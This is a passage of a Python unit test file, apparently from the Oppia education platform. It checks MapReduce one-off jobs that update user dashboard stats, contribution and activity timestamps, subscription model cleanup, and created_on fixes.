self._record_play(exp_id, init_state_name)
event_services.StatsEventsHandler.record(
self.EXP_ID_1, 1, {
'num_starts': 2,
'num_actual_starts': 0,
'num_completions': 0,
'state_stats_mapping': {}
})
self.process_and_flush_pending_tasks()
MockUserStatsAggregator.start_computation()
self.process_and_flush_pending_mapreduce_tasks()
with self.swap(
user_services,
'get_current_date_as_string',
self.mock_get_current_date_as_string):
self._run_one_off_job()
weekly_stats = user_services.get_weekly_dashboard_stats(self.owner_id)
self.assertEqual(
weekly_stats, [{
self.mock_get_current_date_as_string(): {
'num_ratings': 1,
'average_ratings': 4.0,
'total_plays': 2
}
}])
MockUserStatsAggregator.stop_computation(self.owner_id)
self.process_and_flush_pending_mapreduce_tasks()
self._rate_exploration('user2', exp_id, 2)
MockUserStatsAggregator.start_computation()
self.process_and_flush_pending_mapreduce_tasks()
def _mock_get_date_after_one_week():
"""Returns the date of the next week."""
return self.DATE_AFTER_ONE_WEEK
with self.swap(
user_services,
'get_current_date_as_string',
_mock_get_date_after_one_week):
self._run_one_off_job()
expected_results_list = [
{
self.mock_get_current_date_as_string(): {
'num_ratings': 1,
'average_ratings': 4.0,
'total_plays': 2
}
},
{
_mock_get_date_after_one_week(): {
'num_ratings': 2,
'average_ratings': 3.0,
'total_plays': 2
}
}
]
weekly_stats = user_services.get_weekly_dashboard_stats(self.owner_id)
self.assertEqual(weekly_stats, expected_results_list)
self.assertEqual(
user_services.get_last_week_dashboard_stats(self.owner_id),
expected_results_list[1])
class UserFirstContributionMsecOneOffJobTests(test_utils.GenericTestBase):
EXP_ID = 'test_exp'
def setUp(self):
super(UserFirstContributionMsecOneOffJobTests, self).setUp()
self.signup(self.ADMIN_EMAIL, self.ADMIN_USERNAME)
self.admin_id = self.get_user_id_from_email(self.ADMIN_EMAIL)
self.set_admins([self.ADMIN_USERNAME])
self.admin = user_services.get_user_actions_info(self.admin_id)
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.owner = user_services.get_user_actions_info(self.owner_id)
self.signup(self.EDITOR_EMAIL, self.EDITOR_USERNAME)
self.editor_id = self.get_user_id_from_email(self.EDITOR_EMAIL)
def test_contribution_msec_updates_on_published_explorations(self):
exploration = self.save_new_valid_exploration(
self.EXP_ID, self.admin_id, end_state_name='End')
init_state_name = exploration.init_state_name
# Test that no contribution time is set.
job_id = (
user_jobs_one_off.UserFirstContributionMsecOneOffJob.create_new())
user_jobs_one_off.UserFirstContributionMsecOneOffJob.enqueue(job_id)
self.process_and_flush_pending_mapreduce_tasks()
self.assertIsNone(
user_services.get_user_settings(
self.admin_id).first_contribution_msec)
# Test all owners and editors of exploration after publication have
# updated times.
exp_services.publish_exploration_and_update_user_profiles(
self.admin, self.EXP_ID)
rights_manager.release_ownership_of_exploration(
self.admin, self.EXP_ID)
exp_services.update_exploration(
self.editor_id, self.EXP_ID, [exp_domain.ExplorationChange({
'cmd': 'edit_state_property',
'state_name': init_state_name,
'property_name': 'widget_id',
'new_value': 'MultipleChoiceInput'
}), exp_domain.ExplorationChange({
'cmd': 'edit_state_property',
'state_name': init_state_name,
'property_name': 'widget_customization_args',
'new_value': {
'choices': {
'value': [{
'content_id': 'ca_choices_0',
'html': '<p>Choice 1</p>'
}]
},
'showChoicesInShuffledOrder': {'value': True}
}
})], 'commit')
job_id = (
user_jobs_one_off.UserFirstContributionMsecOneOffJob.create_new())
user_jobs_one_off.UserFirstContributionMsecOneOffJob.enqueue(job_id)
self.process_and_flush_pending_mapreduce_tasks()
self.assertIsNotNone(user_services.get_user_settings(
self.admin_id).first_contribution_msec)
self.assertIsNotNone(user_services.get_user_settings(
self.editor_id).first_contribution_msec)
def test_contribution_msec_does_not_update_on_unpublished_explorations(
self):
self.save_new_valid_exploration(
self.EXP_ID, self.owner_id, end_state_name='End')
exp_services.publish_exploration_and_update_user_profiles(
self.owner, self.EXP_ID)
# We now manually reset the user's first_contribution_msec to None.
# This is to test that the one off job skips over the unpublished
# exploration and does not reset the user's first_contribution_msec.
user_models.UserSettingsModel(
id=self.owner_id,
email='<EMAIL>',
username='username',
first_contribution_msec=None
).put()
rights_manager.unpublish_exploration(self.admin, self.EXP_ID)
# Test that first contribution time is not set for unpublished
# explorations.
job_id = (
user_jobs_one_off.UserFirstContributionMsecOneOffJob.create_new())
user_jobs_one_off.UserFirstContributionMsecOneOffJob.enqueue(job_id)
self.process_and_flush_pending_mapreduce_tasks()
self.assertIsNone(user_services.get_user_settings(
self.owner_id).first_contribution_msec)
def test_contribution_msec_is_not_generated_if_exploration_not_created(
self):
model1 = exp_models.ExplorationRightsSnapshotMetadataModel(
id='exp_id-1', committer_id=self.owner_id, commit_type='create')
model1.update_timestamps()
model1.put()
self.assertIsNone(user_services.get_user_settings(
self.owner_id).first_contribution_msec)
job_id = (
user_jobs_one_off.UserFirstContributionMsecOneOffJob.create_new())
user_jobs_one_off.UserFirstContributionMsecOneOffJob.enqueue(job_id)
self.process_and_flush_pending_mapreduce_tasks()
self.assertIsNone(user_services.get_user_settings(
self.owner_id).first_contribution_msec)
class UserLastExplorationActivityOneOffJobTests(test_utils.GenericTestBase):
def setUp(self):
super(UserLastExplorationActivityOneOffJobTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.signup(self.EDITOR_EMAIL, self.EDITOR_USERNAME)
self.editor_id = self.get_user_id_from_email(self.EDITOR_EMAIL)
self.exp_id = 'exp'
def _run_one_off_job(self):
"""Runs the one-off MapReduce job."""
job_id = (
user_jobs_one_off.UserLastExplorationActivityOneOffJob.create_new())
user_jobs_one_off.UserLastExplorationActivityOneOffJob.enqueue(job_id)
self.assertEqual(
self.count_jobs_in_mapreduce_taskqueue(
taskqueue_services.QUEUE_NAME_ONE_OFF_JOBS), 1)
self.process_and_flush_pending_mapreduce_tasks()
def test_that_last_created_time_is_updated(self):
self.login(self.OWNER_EMAIL)
self.save_new_valid_exploration(
self.exp_id, self.owner_id, end_state_name='End')
self.logout()
user_models.UserSettingsModel(
id=self.owner_id,
email=self.OWNER_EMAIL,
last_created_an_exploration=None
).put()
owner_settings = user_services.get_user_settings(self.owner_id)
self.assertIsNone(owner_settings.last_created_an_exploration)
self.assertIsNone(owner_settings.last_edited_an_exploration)
self._run_one_off_job()
owner_settings = user_services.get_user_settings(self.owner_id)
self.assertIsNotNone(owner_settings.last_created_an_exploration)
self.assertIsNotNone(owner_settings.last_edited_an_exploration)
def test_that_last_edited_time_is_updated(self):
self.login(self.OWNER_EMAIL)
self.save_new_valid_exploration(
self.exp_id, self.owner_id, end_state_name='End')
self.logout()
self.login(self.EDITOR_EMAIL)
exp_services.update_exploration(
self.editor_id, self.exp_id, [exp_domain.ExplorationChange({
'cmd': 'edit_exploration_property',
'property_name': 'objective',
'new_value': 'the objective'
})], 'Test edit')
self.logout()
user_models.UserSettingsModel(
id=self.editor_id,
email=self.EDITOR_EMAIL,
last_edited_an_exploration=None
).put()
editor_settings = user_services.get_user_settings(self.editor_id)
self.assertIsNone(editor_settings.last_created_an_exploration)
self.assertIsNone(editor_settings.last_edited_an_exploration)
self._run_one_off_job()
editor_settings = user_services.get_user_settings(self.editor_id)
self.assertIsNotNone(editor_settings.last_edited_an_exploration)
self.assertIsNone(editor_settings.last_created_an_exploration)
def test_that_last_edited_and_created_time_both_updated(self):
self.login(self.OWNER_EMAIL)
self.save_new_valid_exploration(
self.exp_id, self.owner_id, end_state_name='End')
exp_services.update_exploration(
self.owner_id, self.exp_id, [exp_domain.ExplorationChange({
'cmd': 'edit_exploration_property',
'property_name': 'objective',
'new_value': 'the objective'
})], 'Test edit')
self.logout()
self.login(self.EDITOR_EMAIL)
exp_services.update_exploration(
self.editor_id, self.exp_id, [exp_domain.ExplorationChange({
'cmd': 'edit_exploration_property',
'property_name': 'objective',
'new_value': 'new objective'
})], 'Test edit new')
self.logout()
user_models.UserSettingsModel(
id=self.owner_id,
email=self.OWNER_EMAIL,
last_created_an_exploration=None,
last_edited_an_exploration=None
).put()
user_models.UserSettingsModel(
id=self.editor_id,
email=self.EDITOR_EMAIL,
last_edited_an_exploration=None
).put()
owner_settings = user_services.get_user_settings(self.owner_id)
editor_settings = user_services.get_user_settings(self.editor_id)
self.assertIsNone(owner_settings.last_created_an_exploration)
self.assertIsNone(owner_settings.last_edited_an_exploration)
self.assertIsNone(editor_settings.last_created_an_exploration)
self.assertIsNone(editor_settings.last_edited_an_exploration)
self._run_one_off_job()
owner_settings = user_services.get_user_settings(self.owner_id)
editor_settings = user_services.get_user_settings(self.editor_id)
self.assertIsNotNone(owner_settings.last_edited_an_exploration)
self.assertIsNotNone(owner_settings.last_created_an_exploration)
self.assertIsNotNone(editor_settings.last_edited_an_exploration)
self.assertIsNone(editor_settings.last_created_an_exploration)
def test_that_last_edited_and_created_time_are_not_updated(self):
user_models.UserSettingsModel(
id=self.owner_id,
email=self.OWNER_EMAIL,
last_created_an_exploration=None,
last_edited_an_exploration=None
).put()
owner_settings = user_services.get_user_settings(self.owner_id)
self.assertIsNone(owner_settings.last_created_an_exploration)
self.assertIsNone(owner_settings.last_edited_an_exploration)
self._run_one_off_job()
owner_settings = user_services.get_user_settings(self.owner_id)
self.assertIsNone(owner_settings.last_created_an_exploration)
self.assertIsNone(owner_settings.last_edited_an_exploration)
class CleanupUserSubscriptionsModelUnitTests(test_utils.GenericTestBase):
def setUp(self):
super(CleanupUserSubscriptionsModelUnitTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup('user@email', 'user')
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.user_id = self.get_user_id_from_email('user@email')
self.owner = user_services.get_user_actions_info(self.owner_id)
explorations = [exp_domain.Exploration.create_default_exploration(
'%s' % i,
title='title %d' % i,
category='category%d' % i
) for i in python_utils.RANGE(3)]
for exp in explorations:
exp_services.save_new_exploration(self.owner_id, exp)
rights_manager.publish_exploration(self.owner, exp.id)
for exp in explorations:
subscription_services.subscribe_to_exploration(
self.user_id, exp.id)
self.process_and_flush_pending_mapreduce_tasks()
def test_standard_operation(self):
for exp_id in python_utils.RANGE(3):
exp_models.ExplorationModel.get('%s' % exp_id).delete(
self.owner_id, 'deleted exploration')
owner_subscription_model = user_models.UserSubscriptionsModel.get(
self.owner_id)
self.assertEqual(len(owner_subscription_model.exploration_ids), 3)
user_subscription_model = user_models.UserSubscriptionsModel.get(
self.user_id)
self.assertEqual(len(user_subscription_model.exploration_ids), 3)
job = (
user_jobs_one_off
.CleanupExplorationIdsFromUserSubscriptionsModelOneOffJob
)
job_id = job.create_new()
job.enqueue(job_id)
self.assertEqual(
self.count_jobs_in_mapreduce_taskqueue(
taskqueue_services.QUEUE_NAME_ONE_OFF_JOBS), 1)
self.process_and_flush_pending_mapreduce_tasks()
owner_subscription_model = user_models.UserSubscriptionsModel.get(
self.owner_id)
self.assertEqual(len(owner_subscription_model.exploration_ids), 0)
user_subscription_model = user_models.UserSubscriptionsModel.get(
self.user_id)
self.assertEqual(len(user_subscription_model.exploration_ids), 0)
actual_output = job.get_output(job_id)
expected_output = [
u'[u\'Successfully cleaned up UserSubscriptionsModel %s and '
'removed explorations 0, 1, 2\', 1]' %
self.owner_id,
u'[u\'Successfully cleaned up UserSubscriptionsModel %s and '
'removed explorations 0, 1, 2\', 1]' %
self.user_id]
self.assertEqual(sorted(actual_output), sorted(expected_output))
class MockUserSettingsModelWithGaeUserId(user_models.UserSettingsModel):
    """Mock UserSettingsModel that allows `gae_user_id` to be set."""
gae_user_id = (
datastore_services.StringProperty(indexed=True, required=False))
class MockUserSettingsModelWithGaeId(user_models.UserSettingsModel):
    """Mock UserSettingsModel that allows `gae_id` to be set."""
gae_id = (
datastore_services.StringProperty(indexed=True, required=True))
class MockUserSubscriptionsModelWithActivityIDs(
user_models.UserSubscriptionsModel):
"""Mock UserSubscriptionsModel so that it allows to set 'activity_ids'. """
activity_ids = (
datastore_services.StringProperty(indexed=True, repeated=True))
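# The mock models above re-declare datastore properties so that test
# instances can be created with fields that cannot otherwise be set on the
# production models; the activity_ids mock is swapped in below to exercise
# RemoveActivityIDsOneOffJob.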
class RemoveActivityIDsOneOffJobTests(test_utils.GenericTestBase):
def _run_one_off_job(self):
"""Runs the one-off MapReduce job."""
job_id = (
user_jobs_one_off.RemoveActivityIDsOneOffJob.create_new())
user_jobs_one_off.RemoveActivityIDsOneOffJob.enqueue(job_id)
self.assertEqual(
self.count_jobs_in_mapreduce_taskqueue(
taskqueue_services.QUEUE_NAME_ONE_OFF_JOBS), 1)
self.process_and_flush_pending_mapreduce_tasks()
stringified_output = (
user_jobs_one_off.RemoveActivityIDsOneOffJob
.get_output(job_id))
eval_output = [ast.literal_eval(stringified_item) for
stringified_item in stringified_output]
return eval_output
def test_one_subscription_model_with_activity_ids(self):
with self.swap(
user_models, 'UserSubscriptionsModel',
MockUserSubscriptionsModelWithActivityIDs):
original_subscription_model = (
user_models.UserSubscriptionsModel(
id='id',
activity_ids=['exp_1', 'exp_2', 'exp_3']
)
)
original_subscription_model.update_timestamps()
original_subscription_model.put()
self.assertIsNotNone(
original_subscription_model.activity_ids)
self.assertIn(
'activity_ids', original_subscription_model._values) # pylint: disable=protected-access
self.assertIn(
'activity_ids', original_subscription_model._properties) # pylint: disable=protected-access
output = self._run_one_off_job()
self.assertItemsEqual(
[['SUCCESS_REMOVED - UserSubscriptionsModel', 1]], output)
migrated_subscription_model = (
user_models.UserSubscriptionsModel.get_by_id('id'))
self.assertNotIn(
'activity_ids', migrated_subscription_model._values) # pylint: disable=protected-access
self.assertNotIn(
'activity_ids', migrated_subscription_model._properties) # pylint: disable=protected-access
self.assertEqual(
original_subscription_model.last_updated,
migrated_subscription_model.last_updated)
def test_one_subscription_model_without_activity_ids(self):
original_subscription_model = (
user_models.UserSubscriptionsModel(
id='id'
)
)
original_subscription_model.update_timestamps()
original_subscription_model.put()
self.assertNotIn(
'activity_ids', original_subscription_model._values) # pylint: disable=protected-access
self.assertNotIn(
'activity_ids', original_subscription_model._properties) # pylint: disable=protected-access
output = self._run_one_off_job()
self.assertItemsEqual(
[['SUCCESS_ALREADY_REMOVED - UserSubscriptionsModel', 1]], output)
migrated_subscription_model = (
user_models.UserSubscriptionsModel.get_by_id('id'))
self.assertNotIn(
'activity_ids', migrated_subscription_model._values) # pylint: disable=protected-access
self.assertNotIn(
'activity_ids', migrated_subscription_model._properties) # pylint: disable=protected-access
self.assertEqual(
original_subscription_model.last_updated,
migrated_subscription_model.last_updated)
def test_rerun(self):
original_subscription_model = (
user_models.UserSubscriptionsModel(
id='id'
)
)
original_subscription_model.update_timestamps()
original_subscription_model.put()
self.assertNotIn(
'activity_ids', original_subscription_model._values) # pylint: disable=protected-access
self.assertNotIn(
'activity_ids', original_subscription_model._properties) # pylint: disable=protected-access
output = self._run_one_off_job()
self.assertItemsEqual(
[['SUCCESS_ALREADY_REMOVED - UserSubscriptionsModel', 1]], output)
migrated_subscription_model = (
user_models.UserSubscriptionsModel.get_by_id('id'))
self.assertNotIn(
'activity_ids', migrated_subscription_model._values) # pylint: disable=protected-access
self.assertNotIn(
'activity_ids', migrated_subscription_model._properties) # pylint: disable=protected-access
self.assertEqual(
original_subscription_model.last_updated,
migrated_subscription_model.last_updated)
output = self._run_one_off_job()
self.assertItemsEqual(
[['SUCCESS_ALREADY_REMOVED - UserSubscriptionsModel', 1]], output)
migrated_subscription_model = (
user_models.UserSubscriptionsModel.get_by_id('id'))
self.assertNotIn(
'activity_ids', migrated_subscription_model._values) # pylint: disable=protected-access
self.assertNotIn(
'activity_ids', migrated_subscription_model._properties) # pylint: disable=protected-access
self.assertEqual(
original_subscription_model.last_updated,
migrated_subscription_model.last_updated)
class MockUserSubscriptionsModelWithFeedbackThreadIDs(
user_models.UserSubscriptionsModel):
"""Mock UserSubscriptionsModel so that it allows to set
`feedback_thread_ids`.
"""
feedback_thread_ids = (
datastore_services.StringProperty(indexed=True, repeated=True))
class RemoveFeedbackThreadIDsOneOffJobTests(test_utils.GenericTestBase):
def _run_one_off_job(self):
"""Runs the one-off MapReduce job."""
job_id = (
user_jobs_one_off.RemoveFeedbackThreadIDsOneOffJob.create_new())
user_jobs_one_off.RemoveFeedbackThreadIDsOneOffJob.enqueue(job_id)
self.assertEqual(
self.count_jobs_in_mapreduce_taskqueue(
taskqueue_services.QUEUE_NAME_ONE_OFF_JOBS), 1)
self.process_and_flush_pending_mapreduce_tasks()
stringified_output = (
user_jobs_one_off.RemoveFeedbackThreadIDsOneOffJob
.get_output(job_id))
eval_output = [ast.literal_eval(stringified_item) for
stringified_item in stringified_output]
return eval_output
def test_one_subscription_model_with_feedback_thread_ids(self):
with self.swap(
user_models, 'UserSubscriptionsModel',
MockUserSubscriptionsModelWithFeedbackThreadIDs):
original_subscription_model = (
user_models.UserSubscriptionsModel(
id='id',
feedback_thread_ids=['some_id']
)
)
original_subscription_model.update_timestamps()
original_subscription_model.put()
self.assertIsNotNone(
original_subscription_model.feedback_thread_ids)
self.assertIn(
'feedback_thread_ids', original_subscription_model._values) # pylint: disable=protected-access
self.assertIn(
'feedback_thread_ids', original_subscription_model._properties) # pylint: disable=protected-access
output = self._run_one_off_job()
self.assertItemsEqual(
[['SUCCESS_REMOVED - UserSubscriptionsModel', 1]], output)
migrated_subscription_model = (
user_models.UserSubscriptionsModel.get_by_id('id'))
self.assertNotIn(
'feedback_thread_ids', migrated_subscription_model._values) # pylint: disable=protected-access
self.assertNotIn(
'feedback_thread_ids', migrated_subscription_model._properties) # pylint: disable=protected-access
self.assertEqual(
original_subscription_model.last_updated,
migrated_subscription_model.last_updated)
def test_one_subscription_model_without_feedback_thread_ids(self):
original_subscription_model = (
user_models.UserSubscriptionsModel(
id='id'
)
)
original_subscription_model.update_timestamps()
original_subscription_model.put()
self.assertNotIn(
'feedback_thread_ids', original_subscription_model._values) # pylint: disable=protected-access
self.assertNotIn(
'feedback_thread_ids', original_subscription_model._properties) # pylint: disable=protected-access
output = self._run_one_off_job()
self.assertItemsEqual(
[['SUCCESS_ALREADY_REMOVED - UserSubscriptionsModel', 1]], output)
migrated_subscription_model = (
user_models.UserSubscriptionsModel.get_by_id('id'))
self.assertNotIn(
'feedback_thread_ids', migrated_subscription_model._values) # pylint: disable=protected-access
self.assertNotIn(
'feedback_thread_ids', migrated_subscription_model._properties) # pylint: disable=protected-access
self.assertEqual(
original_subscription_model.last_updated,
migrated_subscription_model.last_updated)
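# The tests below exercise the one-off job that rewrites a user's created_on
# to the earliest timestamp found across their models and reports which
# attribute supplied that timestamp.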
class FixUserSettingsCreatedOnOneOffJobTests(test_utils.GenericTestBase):
AUTO_CREATE_DEFAULT_SUPERADMIN_USER = False
USER_ID_1 = 'user_id'
USER_ID_2 = 'user_id_2'
EMAIL_1 = '<EMAIL>'
EMAIL_2 = '<EMAIL>'
SKILL_ID_1 = 'skill_id_1'
SKILL_ID_2 = 'skill_id_2'
DEGREE_OF_MASTERY = 0.5
EXPLORATION_IDS = ['exp_1', 'exp_2', 'exp_3']
COLLECTION_IDS = ['col_1', 'col_2', 'col_3']
EXP_ID_ONE = 'exp_id_one'
EXP_ID_TWO = 'exp_id_two'
EXP_ID_THREE = 'exp_id_three'
def _run_one_off_job(self):
"""Runs the one-off MapReduce job."""
job_id = (
user_jobs_one_off.FixUserSettingsCreatedOnOneOffJob.create_new())
user_jobs_one_off.FixUserSettingsCreatedOnOneOffJob.enqueue(job_id)
self.assertEqual(
self.count_jobs_in_mapreduce_taskqueue(
taskqueue_services.QUEUE_NAME_ONE_OFF_JOBS), 1)
self.process_and_flush_pending_mapreduce_tasks()
stringified_output = (
user_jobs_one_off.FixUserSettingsCreatedOnOneOffJob
.get_output(job_id))
eval_output = [ast.literal_eval(stringified_item) for
stringified_item in stringified_output]
sorted_eval_output = []
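        # Sort the user ids inside the ERROR_NOT_UP_TO_DATE_USER bucket so
        # that assertions do not depend on MapReduce output ordering.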
for key, values in eval_output:
if key == 'ERROR_NOT_UP_TO_DATE_USER':
values.sort()
sorted_eval_output.append([key, values])
return sorted_eval_output
def test_update_user_model_using_all_user_settings_model_attributes(self):
user_settings_model = (
user_models.UserSettingsModel(
id=self.USER_ID_1,
email=self.EMAIL_1,
)
)
user_settings_model.update_timestamps()
original_created_on_timestamp = user_settings_model.created_on
        # last_agreed_to_terms is given the earliest timestamp among the
        # attributes set below, so it is the value the job should copy into
        # created_on.
user_settings_model.last_agreed_to_terms = (
original_created_on_timestamp + datetime.timedelta(hours=2))
final_created_on_timestamp = user_settings_model.last_agreed_to_terms
user_settings_model.created_on = (
final_created_on_timestamp + datetime.timedelta(days=10))
user_settings_model.last_logged_in = (
final_created_on_timestamp + datetime.timedelta(minutes=1))
user_settings_model.last_started_state_editor_tutorial = (
final_created_on_timestamp + datetime.timedelta(minutes=3))
user_settings_model.last_updated = (
final_created_on_timestamp + datetime.timedelta(hours=12))
user_settings_model.last_started_state_translation_tutorial = (
final_created_on_timestamp + datetime.timedelta(hours=14))
user_settings_model.last_edited_an_exploration = (
final_created_on_timestamp + datetime.timedelta(hours=15))
user_settings_model.last_created_an_exploration = (
final_created_on_timestamp + datetime.timedelta(hours=16))
user_settings_model.first_contribution_msec = (
utils.get_time_in_millisecs(
final_created_on_timestamp + datetime.timedelta(hours=10))
)
user_settings_model.put()
expected_output = [
[
'SUCCESS_UPDATED_USING_UserSettingsModel_last_agreed_to_terms',
1
],
['ERROR_NOT_UP_TO_DATE_USER', [self.USER_ID_1]]
]
self.assertLess(
final_created_on_timestamp, user_settings_model.created_on)
actual_output = self._run_one_off_job()
self.assertItemsEqual(expected_output, actual_output)
migrated_user_model = (
user_models.UserSettingsModel.get_by_id(self.USER_ID_1))
self.assertEqual(
migrated_user_model.created_on, final_created_on_timestamp)
def test_update_using_datetime_attributes_of_all_other_models(self):
user_subscriptions_model = user_models.UserSubscriptionsModel(
id=self.USER_ID_1)
user_subscriptions_model.update_timestamps()
        # The models are created sequentially, so their timestamps increase,
        # and the created_on attribute of user_subscriptions_model therefore
        # holds the smallest timestamp value.
final_created_on_timestamp = user_subscriptions_model.created_on
user_subscriptions_model.last_updated = (
final_created_on_timestamp + datetime.timedelta(hours=2)
)
user_subscriptions_model.last_checked = (
final_created_on_timestamp + datetime.timedelta(hours=3)
)
user_subscriptions_model.put()
user_settings_model = (
user_models.UserSettingsModel(
id=self.USER_ID_1,
email=self.EMAIL_1,
)
)
user_settings_model.update_timestamps()
user_settings_model.created_on = (
final_created_on_timestamp + datetime.timedelta(hours=10)
)
user_settings_model.last_updated = (
final_created_on_timestamp + datetime.timedelta(hours=10)
)
user_settings_model.put()
exploration_user_data_model = user_models.ExplorationUserDataModel(
id='%s.%s' % (self.USER_ID_1, self.EXP_ID_ONE),
user_id=self.USER_ID_1,
exploration_id=self.EXP_ID_ONE,
rating=2,
rated_on=final_created_on_timestamp + datetime.timedelta(hours=1),
draft_change_list={'new_content': {}},
draft_change_list_last_updated=(
final_created_on_timestamp + datetime.timedelta(hours=2)),
draft_change_list_exp_version=3,
draft_change_list_id=1
)
exploration_user_data_model.update_timestamps()
exploration_user_data_model.created_on = (
final_created_on_timestamp + datetime.timedelta(hours=5)
)
exploration_user_data_model.last_updated = (
final_created_on_timestamp + datetime.timedelta(hours=5)
)
exploration_user_data_model.put()
user_contributions_model = user_models.UserContributionsModel(
id=self.USER_ID_1)
user_contributions_model.update_timestamps()
user_contributions_model.last_updated = (
final_created_on_timestamp + datetime.timedelta(hours=5)
)
user_contributions_model.put()
user_email_preferences_model = user_models.UserEmailPreferencesModel(
id=self.USER_ID_1)
user_email_preferences_model.update_timestamps()
user_email_preferences_model.last_updated = (
final_created_on_timestamp + datetime.timedelta(hours=6)
)
user_email_preferences_model.put()
user_stats_model = user_models.UserStatsModel(
id=self.USER_ID_1)
user_stats_model.update_timestamps()
user_stats_model.created_on = (
final_created_on_timestamp + datetime.timedelta(hours=10)
)
user_stats_model.last_updated = (
final_created_on_timestamp + datetime.timedelta(hours=10)
)
user_stats_model.put()
expected_output = [
[
'SUCCESS_UPDATED_USING_UserSubscriptionsModel_created_on', 1
],
['ERROR_NOT_UP_TO_DATE_USER', [self.USER_ID_1]]
]
self.assertLess(
final_created_on_timestamp, user_settings_model.created_on)
actual_output = self._run_one_off_job()
self.assertItemsEqual(expected_output, actual_output)
migrated_user_model = (
user_models.UserSettingsModel.get_by_id(self.USER_ID_1))
self.assertEqual(
migrated_user_model.created_on, final_created_on_timestamp)
def test_time_difference_less_than_time_delta_does_not_update(self):
self.signup(self.NEW_USER_EMAIL, self.NEW_USER_USERNAME)
user_id = self.get_user_id_from_email(self.NEW_USER_EMAIL)
user_auth_details_model = (
auth_models.UserAuthDetailsModel.get(user_id))
user_auth_details_model.update_timestamps()
user_auth_details_model.put()
user_settings_model = (
user_models.UserSettingsModel(
id=user_id,
email=self.NEW_USER_EMAIL,
)
)
user_settings_model.update_timestamps()
user_settings_model.put()
        # The UserAuthDetailsModel was created before the UserSettingsModel,
        # but the time difference is smaller than the required time_delta (it
        # is well under a second here), so created_on is not updated.
self.assertLess(
user_auth_details_model.created_on, user_settings_model.created_on)
expected_output = [['SUCCESS_ALREADY_UP_TO_DATE', 1]]
actual_output = self._run_one_off_job()
self.assertItemsEqual(expected_output, actual_output)
migrated_user_model = (
user_models.UserSettingsModel.get_by_id(user_id))
self.assertNotEqual(
migrated_user_model.created_on, user_auth_details_model.created_on)
def test_update_for_multiple_users_works_correctly(self):
user_settings_model_1 = (
user_models.UserSettingsModel(
id=self.USER_ID_1,
email=self.EMAIL_1,
)
)
user_settings_model_1.update_timestamps()
user_settings_model_1.created_on += datetime.timedelta(hours=10)
final_created_on_timestamp_1 = user_settings_model_1.last_updated
user_settings_model_1.put()
user_settings_model_2 = (
user_models.UserSettingsModel(
id=self.USER_ID_2,
email=self.EMAIL_2,
)
)
user_settings_model_2.update_timestamps()
original_created_on_timestamp_2 = user_settings_model_2.created_on
user_settings_model_2.created_on = (
original_created_on_timestamp_2 + datetime.timedelta(hours=5))
user_settings_model_2.last_updated = (
original_created_on_timestamp_2 + datetime.timedelta(hours=6))
user_settings_model_2.last_logged_in = (
original_created_on_timestamp_2 + datetime.timedelta(hours=1))
final_created_on_timestamp_2 = user_settings_model_2.last_logged_in
user_settings_model_2.put()
expected_output = [
['SUCCESS_UPDATED_USING_UserSettingsModel_last_updated', 1],
['SUCCESS_UPDATED_USING_UserSettingsModel_last_logged_in', 1],
['ERROR_NOT_UP_TO_DATE_USER', [self.USER_ID_1, self.USER_ID_2]]
]
self.assertLess(
final_created_on_timestamp_1, user_settings_model_1.created_on)
self.assertLess(
final_created_on_timestamp_2, user_settings_model_2.created_on)
actual_output = self._run_one_off_job()
self.assertItemsEqual(actual_output, expected_output)
migrated_user_model_1 = (
user_models.UserSettingsModel.get_by_id(self.USER_ID_1))
migrated_user_model_2 = (
user_models.UserSettingsModel.get_by_id(self.USER_ID_2))
self.assertEqual(
migrated_user_model_1.created_on, final_created_on_timestamp_1)
self.assertEqual(
migrated_user_model_2.created_on, final_created_on_timestamp_2)
def test_multiple_runs_of_one_off_job_works_correctly(self):
user_settings_model_1 = (
user_models.UserSettingsModel(
id=self.USER_ID_1,
email=self.EMAIL_1,
)
)
user_settings_model_1.update_timestamps()
user_settings_model_1.created_on += datetime.timedelta(hours=10)
final_created_on_timestamp_1 = user_settings_model_1.last_updated
user_settings_model_1.put()
user_settings_model_2 = (
user_models.UserSettingsModel(
id=self.USER_ID_2,
email=self.EMAIL_2,
)
)
user_settings_model_2.update_timestamps()
user_settings_model_2.created_on += datetime.timedelta(hours=5)
final_created_on_timestamp_2 = user_settings_model_2.last_updated
user_settings_model_2.put()
expected_output = [['SUCCESS_ALREADY_UP_TO_DATE', 2]]
self.assertLess(
final_created_on_timestamp_1, user_settings_model_1.created_on)
self.assertLess(
final_created_on_timestamp_2, user_settings_model_2.created_on)
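        # The job is run twice; only the second run's output is asserted, and
        # it should report both users as already up to date once the first
        # run has fixed created_on.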
actual_output = self._run_one_off_job()
actual_output = self._run_one_off_job()
self.assertItemsEqual(actual_output, expected_output)
migrated_user_model_1 = (
user_models.UserSettingsModel.get_by_id(self.USER_ID_1))
migrated_user_model_2 = (
user_models.UserSettingsModel.get_by_id(self.USER_ID_2))
self.assertEqual(
migrated_user_model_1.created_on, final_created_on_timestamp_1)
self.assertEqual(
migrated_user_model_2.created_on, final_created_on_timestamp_2)
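# The audit job tested below only reports which users would need their
# created_on fixed and which attribute holds the lowest timestamp.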
class UserSettingsCreatedOnAuditOneOffJobTests(test_utils.GenericTestBase):
AUTO_CREATE_DEFAULT_SUPERADMIN_USER = False
USER_ID_1 = 'user_id'
USER_ID_2 = 'user_id_2'
EMAIL_1 = '<EMAIL>'
EMAIL_2 = '<EMAIL>'
SKILL_ID_1 = 'skill_id_1'
SKILL_ID_2 = 'skill_id_2'
DEGREE_OF_MASTERY = 0.5
EXPLORATION_IDS = ['exp_1', 'exp_2', 'exp_3']
COLLECTION_IDS = ['col_1', 'col_2', 'col_3']
EXP_ID_ONE = 'exp_id_one'
EXP_ID_TWO = 'exp_id_two'
EXP_ID_THREE = 'exp_id_three'
def setUp(self):
super(UserSettingsCreatedOnAuditOneOffJobTests, self).setUp()
self.user_settings_model = (
user_models.UserSettingsModel(
id=self.USER_ID_1,
email=self.EMAIL_1,
)
)
self.user_settings_model.update_timestamps()
self.lowest_timestamp = self.user_settings_model.created_on
self.user_settings_model.last_agreed_to_terms = (
self.lowest_timestamp + datetime.timedelta(hours=2))
self.user_settings_model.last_logged_in = (
self.lowest_timestamp + datetime.timedelta(minutes=1))
